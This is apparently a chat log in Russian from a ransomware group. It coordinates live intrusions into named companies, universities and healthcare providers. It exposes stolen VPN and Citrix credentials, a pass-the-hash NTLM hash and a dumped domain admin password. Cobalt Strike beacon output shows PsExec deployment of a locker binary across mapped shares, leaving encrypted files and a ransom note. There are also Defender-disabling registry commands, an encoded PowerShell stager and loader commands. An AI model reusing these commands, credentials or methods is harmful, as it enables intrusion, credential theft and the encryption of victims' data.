>description: Veeam Backup Server
>dNSHostName: dcveeam01.Wilsonart.com
``````
>description: VMware vCenter 6.0 Server
>dNSHostName: dcwas79.Wilsonart.com
```
 
```
>dNSHostName: nas_signature.polyrey.net
``осталось вцентер-насы-прочееиз текущего домена ДА +/- проходит в остальныеостальное все готово?чуть позже решим вопросрубит симантекбилдпайп?и везде крашитсятам стоит 2012на всех дк что видны из 5 доменовна всех 2012?@tl1 наши дл крашатся на 2012 винде, включаю вчерашню от дэпаав не видит ихещё есть WI.RWP.COM, там вобще всё на 2003и арборайткрашится процес после запуска дллна uk и eu ДК на 2012, там чистые длки при запуске падаютсесии не тянутсявсё, что _NTLM, снималось удалённо, кроме wilsonart.comпара вроде в карантине, но пингуетсявсе куда надо пролезтьэто все активные?``
uk.Wilsonart.com
arborite.com
eu.Wilsonart.com
resopal.lan
polyrey.com
resopal.ger
``переходим на закрытиеpth polyrey.net\adm-cavailj 99f09cbd168ec7f38bf4981a884f082cВзаимновсем хороших выходыхв пн к часуфайлы удаляйтесеси в слиптак ну ладновполне стоит попробовать*вполнестоит пытаться мсф пробовать? разные нагрузки, порты
спрашиваю вдруг если что, время не тратить)@user3 уже несколько дней в нее долбитсяона сидит рядом с тобойестьа инфы как я понял по тпш нет?:#sisd-net оставим в другой деньсегодня до 12:skull:поэтому она уже сдохла)там отстук должен быть до 40 секунд11 минут пингнижнятам что типо ACADEMIC.NET должно бытьне вижу там твоюв тпш прилетела к user3 а что дальше то с ней делать?) как в кобу заспавнить?от usera(мне в птш ghbktntkf jn .pthf 9пробуюарма?а баольше нет вариков?значит скорее всего портне, он не кусачиймакафитам еще попробуюкакой ав?ща тут еще пару рдп есть:disappointed:нетунеазапустилзапуститпшвидимо ав режет, пробовал разные варианты кобальтовской нагрузки - сессия не прилетает
есть какие нибудь еще варианты сессию заполучить?или ав режет коннекткак вариант - там имется вайтлист по ИП на ТСП соединениеip кобы пингуетсяно процес висит а сесии нетв общем подведя черту не что там закрыт выходной трафик на 443 портда)
я не проверил..скопирован с русскоязычного ресурса?да и вижу там ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=INты используешь правило для фаерволаи если на то пошлоесли его там нет, значит софт на твоей тачке не имет софта который держит 443 открытымскорее всего там был веб сервересли в нетстате был 443 порт локальный открыталя 139 445 и т дт е отображает просто открытые портытут больше играет роль флаг -aнетстат -нникак, предположил
в нетстате его неткак ты определил что 443 закрыт?далеенет)вопрос про занятый порт актуален?иными словами текущая тачка через 57431 порт делает запрос на 172....195:443справа удаленный + порткак видишь слева это локал адрес и портэто шапка нетстата``

Active Connections

  Proto Local Address Foreign Address State
```?то есть порт занятнетвоей кобы?ipвнешний[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ип 172. это что?Прочитал[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) прочитай последние 30 сообщенийне,ну надо сменить порт или перенаправить
сессия по 443 по идее не должна прилететьНа что?все ответили?давсе пришли?по смб линк445по смб, получается, тожея не пробовал, но вроде по 80-му можно поднять сессиюу меня подик я же зумерока ты не куришь?окей я подожду всехкурятскорее нет, чем данадолго они?я нахожусь в кабинете и вижу, что их нету меня у всех статус "в сети "некоторые отошли пока что@user8 за всех отвечает?не прилетит[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) этот[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) или этот[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) этотна какой из?у вас сложности с ответом на вопрос?вроде пока что да@user4 @user7 @user8 живы?```
 Подскажите пожалуйста - если 443 порт закрыт, сессия не прилетит в кобу?
```
+ скрин нижея его процитируювопрос всем вышеу нас в команде 2 человека)не у нас домены https и порт указан 443
так что скорее вопрос что с этим делать если порт закрыт)какой?@all вам вопросПодскажите пожалуйста - если 443 порт закрыт, сессия не прилетит в кобу?`DJIFH*U(7g86S7eyiuhfsleg`выдам новый``
https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009
https://lab.devry.edu/vpn/index.html d40016842 Jackson3
https://lab.devry.edu/vpn/index.html d01677853 Lilly535
https://lab.devry.edu/vpn/index.html d01480444 aDv!9659
```
@user9 допагавозьмешь 2 в работу?естьа вообще если есть еще сети - можно мне``
https://vpn.floridapoly.edu
```
Рассканиваю сабнеты в поисках дк - проверить на зерологонтак, кто чем занят отпишите в групынетВ птш можно экзешники пихать в память как в кобе?у меня пока с дедиком проблемы - нет++?у всех работа есть*даВсе пришли?приветВсем приветдень добрый:space_invader:с такими файлами капец долго будет лол172.17.0.13
172.17.0.8
```
The network path was not found.
```
```
Lost = 4 (100% loss),

``долго будетда должен, часть примапленых дисков в китае лолпо сети долго будет файлы таскать, что б зашифроватьпроверь не умер ли процесс локерадолжен по идеон точно там на замапленных сам отработает?```
beacon> remote-exec psexec 10.10.20.131 C:\starter.exe
[*] Tasked beacon to run 'C:\starter.exe' on 10.10.20.131 via Service Control Manager
[+] host called home, sent: 2005 bytes
[-] Could not start service c122355 on 10.10.20.131: 5
``+на 1 т е на 1 замапленом?чет за последние полчаса у меня только на 1 отработало[ ](https://mediaeveryone.com/group/itc-us-com?msg=9oMDn23BwxRksJAqJ) и можно идтина серверах есть+и на всех серверах)ну теперь ждем как на всех замапленных появится запискавезде файл R3ADM3.txt
на серверах?получаетсявсёна примапленных пока тихо+норму остальных?топестьда ,kznm yf[eqетсьtncm``
10/21/2020 10:01 PM 717 R3ADM3.txt
```13просто кажется что вы больше 10 нацепили может не поехатьпоробуйте запустить билдесли все подключилидургие не мапятсядургих дисков кроме С нет нигде?мои тоже +[ ](https://mediaeveryone.com/group/itc-us-com?msg=hPjLWs4GnypjiiRGo) ```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK N: \\172.17.0.13\C$ Microsoft Windows Network
OK O: \\10.10.0.129\C$ Microsoft Windows Network
OK P: \\10.0.10.143\C$ Microsoft Windows Network
OK Q: \\10.0.10.83\C$ Microsoft Windows Network
OK R: \\10.0.10.163\C$ Microsoft Windows Network
OK S: \\10.0.10.129\C$ Microsoft Windows Network
OK T: \\172.17.0.8\C$ Microsoft Windows Network
OK U: \\10.10.20.126\C$ Microsoft Windows Network
OK V: \\10.0.10.111\C$ Microsoft Windows Network
OK W: \\10.10.20.131\C$ Microsoft Windows Network
OK X: \\10.10.0.135\C$ Microsoft Windows Network
OK Y: \\10.10.0.117\C$ Microsoft Windows Network
OK Z: \\10.0.10.116\C$ Microsoft Windows Network
The command completed successfully.

``````
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
```+и на этом всепо 10 штукможете их просто к текущим 5 серверам замапить``
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
```49а там сколько вс?[ ](https://mediaeveryone.com/group/itc-us-com?msg=BFy8ZYMKrwdTcqrGF) Мы на все вс раскидали в систем32 стартерыхоть какой то обхват на вс будетдаже нет юз на оставшиеся 5 серверова потом прибиваем дки потом запустите по класике деплой на всех пк через псектам не более 10 активных подкл на сколько помнювозьме часть вс на нет юз в этот сервер10.0.0.7он в кобе карсныйодин не трогали+на серверах*везде завелось?все, добиваем?4 дк не трогали + 1 серверкуда можно будет цепнуть те которые не завелисьоставьте в конце дк + 1 серверага нормна серверах вроде пошло
```
Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/13/2020 11:03:20 $Recycle.Bin
          dir 10/21/2020 21:30:41 Config.Msi
          dir 10/21/2020 21:30:40 Deskinfo
          dir 07/14/2009 01:06:44 Documents and Settings
          dir 10/21/2020 21:30:41 ECI
          dir 10/21/2020 21:30:41 Godlan
          dir 10/21/2020 21:30:40 inetpub
          dir 10/21/2020 21:30:41 MultiLink
          dir 10/21/2020 21:30:40 PerfLogs
          dir 10/21/2020 21:30:41 Program Files
          dir 10/21/2020 21:30:41 Program Files (x86)
          dir 10/21/2020 21:30:41 ProgramData
          dir 10/21/2020 21:30:40 Projects
          dir 10/21/2020 21:30:45 RDL
          dir 10/21/2020 21:30:40 Recovery
          dir 10/21/2020 21:30:40 SmartSystems
          dir 10/21/2020 21:30:40 SQL_Docs
          dir 07/11/2014 13:15:08 SSTemp
          dir 09/03/2018 21:01:40 System Volume Information
          dir 10/21/2020 21:30:45 Users
          dir 10/16/2020 13:56:57 Windows
 1kb fil 10/21/2020 21:30:40 .rnd.GQQNX
 13kb file 10/21/2020 21:30:40 Datacollectors.db.GQQNX
 1mb file 10/21/2020 21:30:41 Infor803ERPInstall.log.GQQNX
 0b file 11/27/2018 22:17:27 Inventory.db
 1kb file 10/21/2020 21:30:41 MAPICSCDInstall.log.GQQNX
 680b thread 10/21/2020 21:30:40 mode.txt.GQQNX
 21gb file 10/16/2020 18:20:56 pagefile.sys
 717b file 10/21/2020 21:30:40 R3ADM3.txt
 185kb file 10/21/2020 21:30:27 starter.exe
 4kb file 10/21/2020 21:30:40 VSM000.IDX.GQQNX
``тогда делаем дальшеокей-нета трастов нет?и не проверялине стали рисковать)на остальных серваках не запускается что ли тоже по какой-то причине?серверов 20
живы 18
из них 4 - дкв кобевсе притянутысколько тут серверов и вс?такие экземпляры встречаюся и решение собственно выше)а, ну логично)и всевсе его дискиего замапить на сервер где такой штуки нет``
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
ERROR: Access is denied.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
ERROR: Access is denied.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
ERROR: Access is denied
``или мы вс вообще можем не трогать?ну ок, на одном серве защищенные ветки походутак если там вл то нигде и не отработаетпод ДА токеном даже маунтить не надо ничего)указываем список путейфлагчерез -p akfuберем просто с серверов под ДА токенома зачем вобще на армах запускать? на серверах если завелось - этого достаточнои там проверяемвыборочно еще 3 арма берем``
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


[+] received output:
The system cannot find the file specified.
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting C:\starter.exe on 10.0.20.222...
PsExec could not start C:\starter.exe on 10.0.20.222:
``````
beacon> portscan 10.0.20.222 3389 none
[*] Tasked beacon to scan ports 3389 on 10.0.20.222
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``вроде рдп должно включиться...``
[*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
[Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
[Tasked beacon to run: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
[+] host called home, sent: 472 bytes
[+] received output:
The operation completed successfully.
```не даетто жеnj ;t``
	* Username : egl_admin
	 * Domain : ITC
	 * Password : E@gle@x1s3030
``просто не хочет подключать на пкбез аккаоставили старый у egl_adminмы меняли праоли ДАа ты под кем7не подключает[ ](https://mediaeveryone.com/group/itc-us-com?msg=eLf3auQNBPDqNABtu) не получилось?если не отработает то стоит wl на армах@user9 а попробуй через псек запустить ехе из корняпробуюghj,e.попробуйте тоже по рдп зайти под даа меня не пускает сюда``
beacon> shell c:\explorer.exe
[*] Tasked beacon to run: c:\explorer.exe
[+] host called home, sent: 46 bytes
[+] received output:
Access is denied.

``щас залечуя тоже думаю что такое естьможет вайтлистинг аппликейнешнов?``
shell starter.exe
[*] Tasked beacon to run: starter.exe
[+] host called home, sent: 42 bytes
[+] received output:
Access is denied.


```
это из корняпробуйте по рдпкая-то херня откровенная``
beacon> shell WINDOWSSystem32.exe
[*] Tasked beacon to run: WINDOWSSystem32.exe
[+] host called home, sent: 50 bytes
[+] received output:
Access is denied.

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
beacon> whoami
[Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt authority\system

```корень С
тест пжлстпапкав ps листе не светится никаких АВпопробуйте корень диска Стоже пишет access deniedпопробуйте другую папкуофнул lockappпричем не удаляет а блочит запускну на серверах мы виндеф батником рубили кста``

beacon> shell dir 1.exe
[*] Tasked beacon to run: dir 1.exe
[+] host called home, sent: 40 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is D85B-9A4C

 Directory of C:\WINDOWS\System32

10/21/2020 09:02 PM 189,440 1.exe
               1 File(s) 189,440 bytes
               0 Dir(s) 190,692,196,352 bytes free

``````
beacon> shell 1.exe
[*] Tasked beacon to run: 1.exe
[+] host called home, sent: 36 bytes
[+] received output:
Access is denied.

```занчит его рубит.....вебрутесли виндеф оффну тогда по логикес обычного jump зашелесли залогиниться под домен админом на ДКвроде кстати виндеф оффвот так с рдп поедет хорошо``
For /f "tokens=*" %%a in (c:\tmp\ComputerList.txt) Do psexec \\%a -i gpupdate
``или недодал ему /forceно суть в том что или псек передал ему все параметры после имени програмыя как бы вижу у него там в процессах висити с прямым указаниеми бези под токеномпо разному пробовалиа зачем вобще это все? почему под токеном не запустить?нет?``
shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
```
это же сработалоэто не параметры самого gpupdate?``
gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
``по моему косяк``
gpupdate.exe 12492 Services 0 4,424 K NT AUTHORITY\SYSTEM 0:00:00

``````
beacon> shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 131 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


[+] received output:
Connecting to 10.0.20.222...


Starting PSEXESVC service on 10.0.20.222...


Connecting with PsExec service on 10.0.20.222...


Starting gpupdate on 10.0.20.222...



gpupdate started on 10.0.20.222 with process ID 46196.

``блочит запуск10.0.20.222дайте ип арма+авер вебрут и только?но все равно не даетбатник отработал на отключение виндефапробовали на паре армов запустить стартер - не даетлокайте серваки, рабочие станции можно маунтами - там почти никогда нету процесов которые хенлдят важные файлы+ батником прошлись на отключение виндефана серверах вроде как отключилосьи потом дкпотом все остальноепроритет на серверапотому что на клиентских машинах не включены правила фаервола на remote managmentна все машиныshell PsExec \\* -d -s -hошибка тама зачем psexec?это дка почему не с дк гпо обновляете?``
beacon> shell PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 121 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Enumerating domain...
A system error has occurred: 2184

``кобальт крашиткоторый жёлтыйтам в интеракт с ITC-DC-SVR01 не входи[ ](https://mediaeveryone.com/group/itc-us-com?msg=qX3zp9exDqEMwuc5q) вот она моя t,exfz вонючаядайте еще доступ в кобу где делайте[ ](https://mediaeveryone.com/group/itc-us-com?msg=2fCSwKCMjzbrqCNBG) даща ток ребутнусьлибо могу еще впнов датьможно сейчас еще посмотреть какие нужно(второй не было(пациентаон же в записке упоминается как идентификатортам в названии "код" билдане, название файла в архивеесли да, то вот
`SDIJ*FHg78SDFGTI&SDtARTE%YET`ты пароль от архива имеешь ввиду?значение похоже вот на это
```
uIYeJR0AY0hM9wCq0pK0S0fSgUFvquxwDi1Ieh3X093RPVdLcow9OB4lOmLDzISp
``парни, а не помните какой тут был код билда локера?угу не видитесли отдает - то не видит в 99 процентах случаесли отдаст результат - значит машина видит ДКможно сделатьshell net group "domain admins" /domмашина не отключена от домена в момент исполнения скрипта этого?`Success! Username: SBolley. Password: thisduckingsucks!02`работаеместь сессиитут у нас на чем затык?user9окк 12предлагаю пораньше и пораньше закончитьЗавтра кокольки?До завтравсем покавсем спасибои идем домойсеси в слипв сессиях за собой удалите файлыsisd.net снят АД. ЛА нет. Ищу где текущий пользак админ в подсетях из subnetsспасибодругое делоУ меня ничего, затра попробую остальные нагрузки и работу через ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` в `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - ошибка при логине в цитрикс
`mch1.org` - нет доступов вобще никуда кроме медицинского приложения, в котором невозможно ввести логин и пароль
`protransport.cloud.com` - доступ есть только к приложению по грузо-перевозке, входные данные к нему не подходят
`unf.edu `- сейчас в работе, сняты адинфо, ДА, ДК, кербы переданы тл2, снят список шар, сейчас проходка по сети и съём мимика+хэшдампане дает подлкючится с ip дедика
```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx
```
ситрикс никуда не ведет кроме админок сайтов, впн тунель на дедике есть но компов в сети не видно
```
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml
```
в работе - о прогрессе писал в конфе
в двцух словах никуда не получилось двинуться, мало пк
сейчас стоит расскан по /16 на 445
```
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com
``oasispetroleum.comничего не запустить, закрыто админом cmd adm psребята, пожалуйста, пишите о каком домене речь и что не так или так и не понял как мне элевейт кит попробовать через ту тулзу, завтра попробую через дэдик всё сделатьтут``
https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
```в первом что не так было?@user3 у меня на тебя 2 доступа записаноУ меня ничего, затра попробую остальные нагрузки и работу через psгде что не пошло и какой прогресSISD.NET - продолжаю `сканю подсетки из сабнетс - ищу ге пользак админ`прям по всемотпиши по всем своим текущим доступам которые бралитак ну чтоя бы для начала все равно снял ад, керб, шарпфайндер. текущий тул позволяет если АВ не сильно кусачийчекну8443 порт ещетолько хотел про него написать)rev_tcp_rc4 очень неплох от мсфаЧекал разные портыrev_tcp
rev_http
rev_https
80/443/53я бы поигрался с листенерами и портамида думаю тут проверить в кобу и в арму 2 нагрузки и можно понять что не тянется)не однократно прокатывало сессии в армитажад инфо выгрузитьнадо было работать в текущих условиях, снять керб и т десли не пустило чистую длл значит блочит именно трафиктак там дело не в нагрузкахПробовал запустить разные нагрузки. Не задалосьдо 11 работаем, в 11 итоги мин на 10 и по домамв 11 сворачиваемсяотпиште в групы что сделалипиши плиз в конфу где проблемы[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) вообщем с моей сессией печально
запускаю какой-нибуль тул - он отрабатывает и сессия отлетаета на других нетзапускал - пишет что на той машине где я есть доступ к админским шарам, но прав у него нет почему тошейрфайндер запускали? проверяли может пользак имет права админа на другие машины просто ?у меня с mgrmedu.com пока нет подвижек
пользак не ла - права не получается поднять
лажу по сети
+ сессии постоянно отлетают - ав рубитпроверил сканнером мс17 единственный живой сервак 2008 - глухо
снял кербы с трастов и передал тл2
думаю чем подниматьсяпытаюсь систему получитькакие результаты у вас?она грязнее чем земля)даlfкобы?нагрузка чего?запускаю `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!` в cmd/ps нагрузку ``powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHEAVABFAHUAUgB1AFAARQAyAFUAcgBWAGcARAB4AEUAZwBTAGcAUABYADcAbQBwAFYAQQB1AHQAUQBYAGsASgBqAFkAaAAzADUAbgArAC8AQgA5AFQAYwB6AEUANQBtAGQANgBwADIAMQB5AHIASwA3AHUAWQA4AGYAKwBmAFIAQgB3AE8AVABHADQAUABFAHIAawAzAFUAMABNAEgAVQB6AFEAVABIAGkAUgBzAEcAMQBHADIAbABjAHMAMgBIAE0AcQBFAGUAcQBLAC8AVgB5AGkAbwBOAGIARgBJAGMARgA0AHUAWABOAFMAWQB2AFUAUgB6AGEATAA4AGgAeABZAHAAdwBrADEASgArAFYAcQB4AEcASwBrAFUALwBWAHIAdgBjAG8AZgB2AEYARABKAC8AVgB3AG4AUwBvADMAQgBTAEYAMgAwAGgAagBUAFYAMQBlAFYAcQAvAEkAbwBEAFIASwAwAHcAaQA4AEIASQB1ADQAZQB2AC8AaQBZAHYASQBaAE8AQQBvAHAAcQBUADIAdwBVADgAYQBHAFAAMwBPAEQANQB5ADUAZABlAEcAcwBjADQASQBLAGQAOQBRADgASwBFAFQAUgBMAHMATAB6ADAAWABKAHoAVwBhACsAawBaAE4AWAAzAEcATQBiAHgANgBYAEcAMgB3AFQANgBrAC8AcQArAHEAVQBoAGUAZQBFAFMAZQBXAGUAeQB2AEkAZgBzAFYAMwBDAEkARABaAHoAaQBuAFIATABhAHEAUABDAGcA


``` Процесс создается, но сессия не прилетаети амси байпас скрипт блочит как малварькак скрипт[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) я пробовал, блочит ави еще, повторяю хз какой раз, удаляйте за собой тулы и любые свои файлы из системыинвок керберостом снимите если рубеус блокиреутпонялдальше уже от тебя зависит как будешь повышать их)у тебя есть весь гитхаб) возможность работы с cmd, загрузкой файлов и т док, а как через эту тулзу повышать привелегии?нет, получается заблочило запуск ехеесли файла нет, то и кербов получается нет, да?когда снимаете керб отсылайте его @tl2 и дублируйте в конфу@user7 в конфу пожалуйста@user9 конфу сделалспасибоготово@user4 продублируй плиз в конфу[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.comя, скинул тл2можно беседуя могу, зальёшь рубиускстатино не скинул ещеясовсем никто?ещё неткто-то снимал кербы?возьми один просто для себяу вас 4 дедика``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``` вот требует старую весию ситрикца, я ее качаю и при установке мне говорит типа: Это не совсем новая версия? Поставь новей. Если я снесу новую которая стоит то парни не смогут юзатьшелкод в личкуОкновый шелкод билдер у @tl1 естьвот так пускается``
rundll32.exe C:\path\to\file\file.dll,entryPoint
regsvr32.exe /s C:\path\to\file.dll
```вот ФУД``
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep

``````
Делаю криптором raw to exe сессия не прилетает.
```
ехе грязный, не делай его))Открылось...у меня было особщение что сайт не поддерживает tls 2.0или смени дедик на другой чисто проверить доступностьбрось его полностьюсвежий?лисакакой браузер юзаешь?там отображается страницада все окДелаю криптором raw to exe сессия не прилетает.С дедика не от крывает страницу https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx тупо весит белый экранто есть креды невалид?``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``` С этим соединение не проходита тут?``
phoen1xasp.com
``````
 https://paloca.cernerworks.com/citrix/prodweb/ dr14349773

``Не запустить cmd, powerShell, taskmgr все почекано админома то ты тише всех работаешькакой был в работе и почему нужна замена напишидаLfтебе надо?даесть еще что на замену?``
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234
```
@user9 заменадавайнет вебая могу тебе еще в работу дать доступы, там может быстрее работать чем тутчекни что там за вебне густону, так пусканул
```
beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024
[*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
172.0.0.188:443
172.0.0.187:443

[+] received output:
Scanner module is complete
``чек веб порты)где-то рядомну хоть что-то там есть``
beacon> portscan 172.0.0.1/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
```:ok_hand:на 24 отсканьпо ДНС сабнетупоставь скан /16 от твоего ипестьесть ли ип на интерфейсепроверь через ipconfigда жив вродеон мог отвалитьсявпн жив?и пинг не проходит к тем ip что ip сканер выдал[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) чет не получается никуда двинуться
впн прокинут но в подсети 172.169.16.1-172.169.17.254 портскан ничего не даетвзял фаервол в си руки и заблокировала, окзаблочил рдп коннекта почему он его?касперский его прибилзавелся ваш дедик второйну вот он скорее всего и заблочил вход[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) да, циткрикс не пускал без едр а виндеф было в падлу включать)создал[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) есть сессияу вас каспер стоял на дедике что ли?ок щас руками пересниму[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) нет это текстовый былсразу отпиши полную ситуацию. ось, что сделал, что получилось, что ожидалось, в чем проблемаа щас снял тулчейномперед тем как меня выкинуло - я снимал рукамиесли - это архив?так а я не понял, ты его руками снял или через тулчейн?я еге не докачал - больше 200 метров файл был``
https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207!
```
@user8 заменаиз тулчейна адф вернул 11 юзеров а без тулчейна сколько?может вполнес ним все в порядке? или может косячить?по тулчейну - он вернул в адфайнде 11 юзеров, а я качал файл 238 Мбвообще ничегоникаких шелов нет?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) тут есть только одно приложение и эти креды ему не катятзалетай скорее, бери ад, бери доступы и пролезай в сетькто же так делает)крепить цитру....и запись о персисте из реестра пропалану я на свою кобу персист поставила откуда у тебя дл на закреп?эмми вобще все исчезло, даже dll на закрепда нету там ничегоесть ав или еще чет?страннов апдате у юзераа где ты их оставил?там странно.... я щас через цирту перезашел, заново сессию себе кинул, а никаких моих файлов там уже нет... как так? спали демоны?а, отличновернулсяя уже.а то он уже инфо забиралпустите кто-нибудь @user4 в сетьтак ну ладно, у вас сейчас 3 дедика естьи впн не отключается даже после ребутаскорее всего улетел дедик за впнзначит от порталас прошитым конфигом)ну перейдя по сылке он сам предложил скачатьот портала?установили откуда?там только цитру установили и всё, даже не настраивали еёвпн поставили?я и user 9 на нём работалидедик к которому не подключаетсяа это что?кто последний работал на 199.241.188.186?``
https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com Blue4586
```
@user8 заменакачал ad infosisd@user4 откуда?@user8 маякни в конфу меня что то сессии отвались(прогресс описал в конфе@user9 @user7 в работечем заняты еще 3 человека?а ты админ?ок, сейчас добавлю пользователю групумб спалили аномалию и убрали группу удаленного доступа`the connection was denied because the user account is not authorized for remote login`
как понять не авторизован для входа ?у кого впн поднялся/есть доступ в сеть?не понял вопросакто еще?@user9 в работелсадмики каких-то сайтов.У меня одна, с цитрикса никуда не пойти
впн включился на новом дедике - буду пробовать смотерть что есть в сети под впномтулчейн на тесты1сколько сетей в работе?``
